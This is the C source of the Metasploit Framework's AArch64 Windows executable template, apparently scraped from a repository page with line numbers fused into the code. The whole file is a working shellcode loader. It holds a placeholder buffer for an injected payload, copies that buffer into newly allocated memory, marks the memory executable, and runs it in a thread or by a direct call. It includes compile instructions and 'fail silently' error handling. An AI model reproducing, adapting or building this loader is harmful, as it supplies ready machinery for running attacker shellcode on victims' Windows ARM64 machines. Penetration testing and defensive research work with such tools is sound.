Path: blob/master/data/templates/src/pe/exe/template_aarch64_windows.c
19846 views
// AArch64 PE EXE Template for Metasploit Framework1//2// -----------------------------------------------------------------------------3//4// Compilation Instructions:5//6// Using MSVC on a Windows ARM64 Host:7//8// cl.exe /nologo /O2 /W3 /GS- /D_WIN64 template_aarch64_windows.c /link ^9// /subsystem:windows /machine:arm64 /entry:main ^10// /out:template_aarch64_windows.exe kernel32.lib11//12// -----------------------------------------------------------------------------1314#define WIN32_LEAN_AND_MEAN15#include <windows.h>16#undef WIN32_LEAN_AND_MEAN1718#define PAYLOAD_MARKER "PAYLOAD:"19#define SCSIZE 81922021char payload[SCSIZE] = PAYLOAD_MARKER;2223int main(void)24{25void *exec_mem;26DWORD old_prot;27HANDLE hThread;2829// Stage 1: Allocate a block of memory. We request READWRITE permissions30// initially so we can copy our payload into it.31exec_mem = VirtualAlloc(NULL, SCSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);32if (exec_mem == NULL)33{34// Fail silently if allocation fails.35return 1;36}3738// Stage 2: Copy the payload from our data section into the new memory block.39// A simple loop is used for maximum compiler compatibility and to avoid40// needing extra headers like <string.h> for memcpy.41for (int i = 0; i < SCSIZE; i++)42{43((char *)exec_mem)[i] = payload[i];44}4546// Stage 3: Change the memory's protection flags from READWRITE to47// EXECUTE_READ.48if (VirtualProtect(exec_mem, SCSIZE, PAGE_EXECUTE_READ, &old_prot) == FALSE)49{50// Fail silently if we cannot make the memory executable.51return 1;52}5354// Stage 4: Execute the shellcode.55hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, NULL);56if (hThread)57{58WaitForSingleObject(hThread, INFINITE);59CloseHandle(hThread);60}61else62{63// As a fallback in case CreateThread fails, call the shellcode directly.64((void (*)())exec_mem)();65}6667return 0;68}697071